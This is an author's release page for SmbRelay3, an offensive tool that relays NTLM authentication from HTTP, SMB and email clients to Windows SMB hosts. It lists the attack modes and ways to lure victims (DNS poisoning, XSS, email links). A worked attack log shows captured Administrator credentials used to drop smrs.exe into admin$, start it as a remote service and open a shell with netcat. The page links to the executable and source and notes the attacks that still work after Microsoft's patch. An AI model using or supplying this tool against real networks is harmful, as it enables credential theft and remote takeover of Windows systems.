Most Windows networks still support insecure authentication schemes by default. This is for example what happends with NTLM who is enable by default until lastest Windows Vista.

NTLM allows users to reply incomming connections against third part systems, and authenticate themselves without knowing the password. Therefore, connecting to a system with NTLM means that you can be owned.

This authentication scheme is used on a variety of protocols, like HTTP. There is also a windows feature that allows your internet browser (iexplore) or the system (explorer) to automatically send your credentials against a network server if the server requires authentication.

If you are able to force remote users to connect to your system (HTTP or SMB) with dns attacks (poisoning,..), social engineering, email link, msn http link, xss, shutting down valid servers and getting the server ip address, or deploying some kind of malicous payload theorically, the network belongs to you. To exploit those security flaws, we have developed a new security tool named SmbRelay 3 that at this time is able to relay both HTTP and SMB authentication.

Smbrelay3 is the first public tool that allows those kinds of attacks. This version also includes an small SMB library for creating crafted messages so, if the incomming connection has Administrative privileges on the client computer, you will automatically get a shell.



Currently the following attacks are implemented:

* HTTP to SMB: Negotiate authentication with an HTTP client and relay credentials to another smb host.

* SMB to SMB: Negotiate authentication with an SMB computer and relay credentials to another windows computer.

* IMAP to SMB: Negotiate authentication with an email IMAP client and relay credentials to another host.

* POP3 to SMB: Negotiate authentication with an email POP3 client and relay credentials to another host.

* SMTP to SMB: Negotiate authentication with an email SMTP client SMB computer and relay credentials.

* Psexec Module: If you already know username and password you can get a shell to the remote computer. This psexec like tool works under win32 and linux as do not use Microsoft API.

* Fake interface:Under linux, a new port 445 binding is done under a different ip address. All packets sent to that interface will be replayed to the previously authenticated system.





If gathered credentials have administration privileges on the target system, under those scenarios you will automatically get a remote shell to the target system. There are also two additional features:

To allow the user to automatically get a remote shell smbrelay needs to send raw smb messages to the SMB server. Thats why smbrelay3 implements its own smb library for creating special crafted packets.



Smbrelay is able to send the following smb requests:

#define SMBCLOSE 0x04
#define SERVICEOPERATION 0x25
#define READANDX 0x2e
#define WRITEANDX 0x2f
#define FINDFIRST2 0x32
#define SESSIONSETUPANDX 0x73
#define TREECONNETANDX 0x75
#define NTCREATEANDX 0xa2

For more information just read the readme file


Attack Example:

C:\smbrelay3>smbrelay3.exe --ListForHTTPRequests --AlternativeHTTPPort 81

SmbRelay3 - SMB to SMB and HTTP to SMB replay attack
(c) 2007 - 2008 Andres Tarasco - [email protected]
Website: http://www.tarasco.org

Listening HTTP thread at port 81
Accepted Connection - Replaying against 192.168.1.2
Read First HTTP Request...
Sending Default HTTP 401 Error response and asking for authentiation NTLM
Read Second HTTP Request with Auhorization Header..
Init HTTP to SMB attack - Connecting with: 192.168.1.2:445
Sending SMB Authentication Handshake
Received SMB Message with NTLM v2 packet
Sending NTLM Challenge from SMB Server to the HTTP Client
Received Final Authentication packet from remote HTTP Client
UserName: Administrator
DomainName: 192.168.1.36
WorkstationName: SERVIDOR
Trying to authenticate to remote SMB as Administrator
Sending Final SMB Authentication packet with NTLM Message type 3
SessionSetupAndX Completed
Authenticacion against 192.168.1.2 Succeed with username Administrator
Connecting against IPC$
Trying to connect to admin$
Creating Remote File smrs.exe under admin$
Writing File smrs.exe into admin$
Closing File handle - FID: 800f
Opening Remote Service Control Manager pipe \svcctl
Sending RPC BindRequest to SCM pipe
Reading Response from Binding Request
Opening Remote Service Control Manager
Creating Remote Service
Opening Remote Service
Starting Remote Service...
Now Remote Service is executed... Try to connect to 192.168.1.2:8080

C:\smbrelay3>nc 192.168.1.2 8080
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>


Special thanks goes to Iñaki Lopez for developing the NTLM library.


Update: A few months after delivering a copy of smbrelay3 to Microsoft MSRC, they have released MS08-068 security bulletin, limitating this vulnerability to be exploited against the same workstation and under the same protocol. As the reflexion attack is fixed, you can still replay credentials to other domain servers or use different protocols. Enjoy :)


+ Download (Windows executable + Source code)
+ Browse source code online
+ Paper Download Spanish Paper (Presented at Lac0n security congress) with detailed information about how does NTLM works and how to exploit Windows authentication